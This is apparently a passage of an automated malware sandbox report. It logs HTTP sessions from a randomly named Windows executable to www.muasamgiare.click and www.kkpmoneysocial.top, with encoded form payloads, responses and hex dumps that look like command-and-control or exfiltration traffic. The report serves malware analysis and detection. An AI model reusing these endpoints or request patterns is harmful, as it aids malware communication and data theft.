                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.66422118.139.62.226802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:30.455719948 CET493OUTGET /bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.muasamgiare.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:31:31.402487993 CET530INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 10 Jan 2025 20:31:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jR
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.664223104.21.16.1802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:36.798453093 CET762OUTPOST /86am/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kkpmoneysocial.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.kkpmoneysocial.top
                                                                    Referer: http://www.kkpmoneysocial.top/86am/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4a 42 5a 6d 6a 30 2f 45 58 67 7a 73 4d 4b 49 46 41 50 5a 4e 4f 61 31 79 76 59 63 4f 57 42 43 50 53 45 31 48 66 39 54 56 32 68 4f 76 54 42 30 69 77 6c 34 2f 68 51 49 38 62 69 4c 4e 67 2b 55 56 6e 55 4d 30 46 62 6a 71 2f 76 61 4c 72 77 55 76 53 61 6d 73 79 2b 79 48 46 79 30 65 35 6f 4d 55 7a 59 33 66 2b 4f 73 5a 31 37 2b 4c 47 58 64 48 79 57 4e 38 45 6d 4e 62 48 51 69 46 41 47 78 34 31 59 59 50 54 56 6b 6e 46 38 46 7a 75 52 4e 64 33 39 6e 73 4b 56 65 66 41 52 45 6b 4b 77 56 71 5a 34 64 45 30 2f 2b 45 45 43 43 4e 59 46 71 5a 31 47 49 56 4b 49 79 66 43 4a 64 41 58 6c 5a 6a
                                                                    Data Ascii: bJMLqbS=6q6n6VLzU8esJBZmj0/EXgzsMKIFAPZNOa1yvYcOWBCPSE1Hf9TV2hOvTB0iwl4/hQI8biLNg+UVnUM0Fbjq/vaLrwUvSamsy+yHFy0e5oMUzY3f+OsZ17+LGXdHyWN8EmNbHQiFAGx41YYPTVknF8FzuRNd39nsKVefAREkKwVqZ4dE0/+EECCNYFqZ1GIVKIyfCJdAXlZj
                                                                    Jan 10, 2025 21:31:37.436233997 CET1236INHTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:31:37 GMT
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Set-Cookie: loclang=en; expires=Mon, 13-Jan-2025 20:31:37 GMT; Max-Age=259200; path=/
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yg90%2B%2Fbz9K5DQsGq9%2Ffe1zPeTvTg%2FFAXNXybT5zZMYjt7YnATDmOoS7wyF%2BOI%2BtR7HLhkgYdja7tI4euiWwYc%2B9ml%2FVcCBDl4WliXDqPs4X0RaFJ8R5%2FrwcMvg4cE4Wws6poYCrys%2F%2BQ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff6e8189448ce0-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1771&rtt_var=885&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 34 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 95 08 20 a9 76 24 39 6e d2 34 b2 5c 14 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 44 47 22 35 92 fe 85 34 6f b0 77 d8 73 ec ad f6 08 83 64 29 56 d6 b8 e9 16 24 33 0c 48 a4 79 5f de 7d 78 3c d2 84 0c 1e bd fa e9 e5 d9 af 3f bf 86 d4 e4 d9 90 0c 9a 07 b2 78 48 06 3a 52 bc 30 43 02 a0 d1 9c f1 1c e5 cc d8 93 99 88 0c 97 c2 76 2e 08 00 40 26 23 56 b6 dd 54 e1 24 a4 1e 17 31 2e dd 22 2d 68 40 00 2e bb 07 be ef 3b 01 19 78 8d da 20 47 c3 20 4a 99 d2 68 42 3a 33 93 bd 23 da 74 0b 96 63 48 e7 1c 17 85 54 86 42 24 85 41 61 42 ba e0 b1 49 c3 18 e7 3c c2 bd aa d1 05 2e b8 e1 2c db d3 11 cb 30 ec 75 41 a7 8a 8b f3 3d 23 f7 26 dc 84 42 d2 21 a9 75 0b 25 0b 54 66 15 52 99 1c f3 9c 25 d8 d2 f6 98 d6 68 b4 a7 65 c4 59 36 e2 79 b2 ef 4e 8b e4 ca a9 6b c6 86 9b ac 6d fc d7 1f bf ff 79 82 c6 d2 90 b3 73 84 5c 0a 5c 01 32 cd b3 15 2c b8 49
                                                                    Data Ascii: 43bn6 v$9n4\m`CDG"54owsd)V$3Hy_}x<?xH:R0Cv.@&#VT$1."-h@.;x G JhB:3#tcHTB$AaBI<.,0uA=#&B!u%TfR%heY6yNkmys\\2,I
                                                                    Jan 10, 2025 21:31:37.436254978 CET785INData Raw: 21 97 63 9e 21 14 a9 14 08 e5 68 5a 12 bd 41 39 c6 35 22 2e 45 4b ff 03 02 53 08 26 45 18 a3 36 80 4c 09 2e 12 d0 dc 20 48 91 71 81 50 b0 55 d9 25 e7 a8 60 b7 7f 00 39 cf 32 2e 05 14 a8 4a 87 4c 0a 46 42 df f7 bb be ef 43 8e f9 18 95 be 39 ba 0a
                                                                    Data Ascii: !c!hZA95".EKS&E6L. HqPU%`92.JLFBC9qo\',f*kL)-5P`<2<oDiI[.xCZ,1#9SQTuNZ#sO)8o(9FY&2LB
                                                                    Jan 10, 2025 21:31:37.436727047 CET22INData Raw: 63 0d 0a e3 e2 02 00 7d a2 b6 b1 c6 0d 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: c}0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.664224104.21.16.1802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:39.345108032 CET786OUTPOST /86am/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kkpmoneysocial.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.kkpmoneysocial.top
                                                                    Referer: http://www.kkpmoneysocial.top/86am/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4c 69 78 6d 67 54 44 45 47 51 7a 76 47 71 49 46 4a 76 5a 4a 4f 61 35 79 76 5a 4a 44 57 7a 6d 50 53 6c 46 48 65 34 7a 56 33 68 4f 76 4c 78 30 64 74 31 35 78 68 51 45 43 62 6a 33 4e 67 2b 41 56 6e 57 45 30 46 6f 4c 74 74 50 61 4a 67 51 55 78 63 36 6d 73 79 2b 79 48 46 79 51 34 35 70 6b 55 7a 6f 48 66 34 73 55 57 75 62 2b 4d 46 58 64 48 32 57 4e 34 45 6d 4e 6c 48 53 61 37 41 46 46 34 31 64 63 50 55 42 51 6b 4d 38 46 39 7a 42 4d 4d 38 39 43 6f 56 6e 44 63 66 53 41 6b 57 33 70 57 63 4f 41 65 6f 4d 2b 6e 57 53 69 50 59 48 79 72 31 6d 49 2f 49 49 4b 66 51 65 52 6e 59 52 38 41 48 36 66 6b 31 37 77 52 58 32 51 74 43 48 52 62 44 68 66 51 45 41 3d 3d
                                                                    Data Ascii: bJMLqbS=6q6n6VLzU8esLixmgTDEGQzvGqIFJvZJOa5yvZJDWzmPSlFHe4zV3hOvLx0dt15xhQECbj3Ng+AVnWE0FoLttPaJgQUxc6msy+yHFyQ45pkUzoHf4sUWub+MFXdH2WN4EmNlHSa7AFF41dcPUBQkM8F9zBMM89CoVnDcfSAkW3pWcOAeoM+nWSiPYHyr1mI/IIKfQeRnYR8AH6fk17wRX2QtCHRbDhfQEA==
                                                                    Jan 10, 2025 21:31:39.963565111 CET1236INHTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:31:39 GMT
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Set-Cookie: loclang=en; expires=Mon, 13-Jan-2025 20:31:39 GMT; Max-Age=259200; path=/
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KB68N1Ld82R%2FnxSdtOcOm4W1sQlhP7Eb7JwZLsUgkRHV34bVrK7U7AG8tS36QfeVWLzeD6D7TTMHE53dqsQErbp67SJQPMqGkm0Fb%2FxLYSfAlWHnUb8l5uKKIzSFRVoRGXujSMzNI5o6"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff6e915ccd1899-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 34 33 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 55 08 20 a9 76 24 39 6e b2 24 b2 5c 0c 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 44 47 22 35 92 f2 0f a4 79 83 bd c3 9e 63 6f b5 47 18 24 4b b1 bc da 4d b7 20 99 61 40 22 cd fb f2 ee c3 e3 91 26 64 f0 e4 e5 4f 2f 2e 7f fd f9 15 24 3a 4b 87 64 d0 3c 90 46 43 32 50 a1 64 b9 1e 12 00 85 fa 92 65 28 0a 6d 4d 0a 1e 6a 26 b8 65 5f 13 00 80 54 84 b4 6c 3b 89 c4 49 60 b8 8c 47 b8 70 f2 24 37 7c 02 70 d3 3d f2 3c cf f6 c9 c0 6d d4 06 19 6a 0a 61 42 a5 42 1d 18 85 9e 1c 9c 18 4d 37 a7 19 06 c6 8c e1 3c 17 52 1b 10 0a ae 91 eb c0 98 b3 48 27 41 84 33 16 e2 41 d5 e8 02 e3 4c 33 9a 1e a8 90 a6 18 f4 ba a0 12 c9 f8 d5 81 16 07 13 a6 03 2e 8c 21 a9 75 73 29 72 94 7a 19 18 22 3e 63 19 8d b1 a5 ed 52 a5 50 2b 57 89 90 d1 74 c4 b2 f8 d0 99 e6 f1 ad 53 1b c6 9a e9 b4 6d fc d7 1f bf ff 79 8e da 54 90 d1 2b 84 4c 70 5c 02 52 c5 d2 25 cc 99 4e 20 13 63 96 22 e4 89 e0 08 e5 68 a3 24 ba 45 39 c2
                                                                    Data Ascii: 43cn6U v$9n$\m`CDG"5ycoG$KM a@"&dO/.$:Kd<FC2Pde(mMj&e_Tl;I`Gp$7|p=<mjaBBM7<RH'A3AL3.!us)rz">cRP+WtSmyT+Lp\R%N c"h$E9
                                                                    Jan 10, 2025 21:31:39.963583946 CET785INData Raw: 15 22 26 78 4b ff 3d 02 95 08 3a 41 18 a3 d2 80 54 72 c6 63 50 4c 23 08 9e 32 8e 90 d3 65 d9 25 66 28 61 bf 7f 04 19 4b 53 26 38 e4 28 4b 87 74 02 5a 40 df f3 ba 9e e7 41 86 d9 18 a5 da 1e 5d 85 e6 ac e2 db f2 e1 d8 f3 f2 c5 d7 0c 12 64 71 d2 5e
                                                                    Data Ascii: "&xK=:ATrcPL#2e%f(aKS&8(KtZ@A]dq^]L[su+|upw(4+|Ct=~O2Yw_9YHeSEQT8Zp=52#vcUua"TT!*o6pWdu,
                                                                    Jan 10, 2025 21:31:39.964098930 CET5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.664226104.21.16.1802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:41.890451908 CET1799OUTPOST /86am/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kkpmoneysocial.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.kkpmoneysocial.top
                                                                    Referer: http://www.kkpmoneysocial.top/86am/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4c 69 78 6d 67 54 44 45 47 51 7a 76 47 71 49 46 4a 76 5a 4a 4f 61 35 79 76 5a 4a 44 57 7a 75 50 54 54 52 48 63 5a 7a 56 77 68 4f 76 56 42 30 59 74 31 35 38 68 51 74 46 62 6a 37 43 67 38 34 56 6d 7a 51 30 4d 35 4c 74 30 2f 61 4a 39 41 55 77 53 61 6d 31 79 2b 6a 4d 46 79 41 34 35 70 6b 55 7a 72 66 66 2f 2b 73 57 73 62 2b 4c 47 58 64 62 79 57 4e 51 45 6d 56 31 48 53 65 72 41 54 31 34 31 39 73 50 56 79 34 6b 52 4d 46 2f 77 42 4d 55 38 39 2b 6e 56 6e 66 2b 66 52 64 42 57 77 42 57 63 6f 64 6e 35 4f 69 4d 44 78 36 33 4e 33 36 35 77 6d 4d 4c 41 4f 32 75 62 66 56 6c 62 6a 6f 35 41 75 72 47 77 4c 68 2b 59 30 38 61 48 68 73 65 43 79 6d 47 65 76 64 41 71 2b 64 44 72 38 4f 42 50 4e 63 38 6a 39 6e 70 52 48 6f 55 53 41 54 4a 31 72 66 65 56 2b 6e 37 6b 77 52 52 54 4f 46 33 6d 47 49 61 47 34 59 36 51 7a 6d 35 67 70 46 79 56 6b 42 77 68 55 72 49 77 38 33 32 4a 34 54 46 76 64 7a 72 48 32 44 55 4a 48 55 49 36 47 62 75 48 35 59 66 4c 37 74 70 54 4f 69 4b 76 6a [TRUNCATED]
                                                                    Data Ascii: bJMLqbS=6q6n6VLzU8esLixmgTDEGQzvGqIFJvZJOa5yvZJDWzuPTTRHcZzVwhOvVB0Yt158hQtFbj7Cg84VmzQ0M5Lt0/aJ9AUwSam1y+jMFyA45pkUzrff/+sWsb+LGXdbyWNQEmV1HSerAT1419sPVy4kRMF/wBMU89+nVnf+fRdBWwBWcodn5OiMDx63N365wmMLAO2ubfVlbjo5AurGwLh+Y08aHhseCymGevdAq+dDr8OBPNc8j9npRHoUSATJ1rfeV+n7kwRRTOF3mGIaG4Y6Qzm5gpFyVkBwhUrIw832J4TFvdzrH2DUJHUI6GbuH5YfL7tpTOiKvjVNliB3wd25QPeijIUcKkintQ1Cobz+iLeQmNYgAJmbEROu9ji+lkDnT4QZoBxI6Z8C2Q2TCX9lqBKk+M+OhhJDd7nzXKZOkLy/h/0wEAx/AIswkuP/dQ4NDu7vYwFQM3dxzc2q6al2CLliRL4eDzBIFkFVjIEbGJ3DeAXxhkjtnT84mdT8SXFf/LKbqShIOqtyJY4C4axzyiAbPXdxq6gFy/DyhbkBm4CfS8x7/eqJZxhbIvXdtmyEcyomSltgFxJGOkyfvb2J/g3gGD72PBWVTK7qDotX5KsyblB5N09/cjbDYskH0XivmVTJPytCLcC+FReeYfehEwHkBELca6GT+A1GLZ+MusUupVTfWuvt6E1C4dvzW+i84vMfHdnWApaCM/spamdC+V/eo75hQd1MH6ixw0jD8lwVeKRnKQWzD+c9YtLGbqQY3FIYkcCjokJutElK4MQQCDSvKF/+dyCza1Ew1o6t+jijbIZuE1ZakwhblInPZizQu/ClYcYVIQqNkB5S8sMAupMfuqHH6wn79X0SYri9SFGyR65g/Kzh7MTzs3mpQP448DLQTv2t71559YHG6VqhD4qPOkQN4Sv3Z8sS3Mm0k5I3Fyipno1v7GQ/FYO+TPb2vhczx+FI+SeHXrvmCP7ntZLbZMnli707z2gb8V7ROk8D [TRUNCATED]
                                                                    Jan 10, 2025 21:31:42.524442911 CET1236INHTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:31:42 GMT
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Set-Cookie: loclang=en; expires=Mon, 13-Jan-2025 20:31:42 GMT; Max-Age=259200; path=/
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AHu5Zb7h4OJPTDxXSAHYMmvuCabYTeu6BRwUKJ1ZDfqh%2B3PfLweXlvRbi%2FpNQn%2FZo7AFZUEvV1Dtmaz6MJx%2ByIBX1dVjCgHhzOhA35h9YkFABlRpcaYdiqYjH5E8jL4%2FczoSuqTxoyQ1"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff6ea158388ce0-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1794&rtt_var=897&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1799&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 34 33 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 55 28 20 a9 76 24 39 6e b2 2c b2 5c 14 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 44 5b 22 35 92 f2 0f a4 79 83 bd c3 9e 63 6f b5 47 18 24 4b b1 bc da 4d b7 20 99 61 40 22 cd fb f2 ee c3 e3 91 26 64 f0 e8 e5 4f 2f 2e 7f fd f9 15 24 3a 4b 87 64 d0 3c 90 46 43 32 50 a1 64 b9 1e 12 00 85 fa 92 65 28 0a 6d 4d 0a 1e 6a 26 b8 65 5f 11 00 80 54 84 b4 6c 3b 89 c4 49 60 b8 8c 47 b8 74 f2 24 37 7c 02 70 dd 3d f6 3c cf f6 c9 c0 6d d4 06 19 6a 0a 61 42 a5 42 1d 18 85 9e 1c 9e 1a 4d 37 a7 19 06 c6 9c e1 22 17 52 1b 10 0a ae 91 eb c0 58 b0 48 27 41 84 73 16 e2 61 d5 e8 02 e3 4c 33 9a 1e aa 90 a6 18 f4 ba a0 12 c9 f8 ec 50 8b c3 09 d3 01 17 c6 90 d4 ba b9 14 39 4a bd 0a 0c 11 9f b1 8c c6 d8 d2 76 a9 52 a8 95 ab 44 c8 68 3a 62 59 7c e4 4c f3 f8 c6 a9 2d 63 cd 74 da 36 fe eb 8f df ff 3c 47 6d 2a c8 e8 0c 21 13 1c 57 80 54 b1 74 05 0b a6 13 c8 c4 98 a5 08 79 22 38 42 39
                                                                    Data Ascii: 43cn6U( v$9n,\m`CD["5ycoG$KM a@"&dO/.$:Kd<FC2Pde(mMj&e_Tl;I`Gt$7|p=<mjaBBM7"RXH'AsaL3P9JvRDh:bY|L-ct6<Gm*!WTty"8B9
                                                                    Jan 10, 2025 21:31:42.524463892 CET792INData Raw: da 28 89 ee 50 8e 70 8d 88 09 de d2 7f 8f 40 25 82 4e 10 c6 a8 34 20 95 9c f1 18 14 d3 08 82 a7 8c 23 e4 74 55 76 89 39 4a 78 dc 3f 86 8c a5 29 13 1c 72 94 a5 43 3a 01 2d a0 ef 79 5d cf f3 20 c3 6c 8c 52 ed 8e ae 42 73 56 f1 6d f9 70 e2 79 f9 f2
                                                                    Data Ascii: (Pp@%N4 #tUv9Jx?)rC:-y] lRBsVmpyk8i/W>B:sbfyo<fY{%zOz1K8.!\4*p^0QTF-1UdQJeuNZ#sO)8oH1ZY&"MLB8fnwm@
                                                                    Jan 10, 2025 21:31:42.525180101 CET5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.664227104.21.16.1802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:44.429563046 CET494OUTGET /86am/?bJMLqbS=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.kkpmoneysocial.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:31:45.060214043 CET1236INHTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:31:45 GMT
                                                                    Content-Type: text/html;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Set-Cookie: loclang=en; expires=Mon, 13-Jan-2025 20:31:44 GMT; Max-Age=259200; path=/
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eaab2uKlk5glzc5tUqDND1qgcGZ%2BkXzASy%2Fzl64eOnfkaaJS2PEbEhY9yMgsKgRM6G75764XAoeNaxU5W%2BM7jfQMgiHXzraXk6KAsBx7CDAl1E2alJVyPiRzlwQPaoXUNRf1K0Iqyf8f"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff6eb128ec7293-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=494&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 64 63 36 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 22 3b 0a 20 20 7d 2c 35 30 30 30 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 61 73 73 65 74 73 2f 73 6f 63 69 61 6c 5f 69 6d 67 32 2e 6a 70 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 f0 9f 8c b9 4c 65 74 [TRUNCATED]
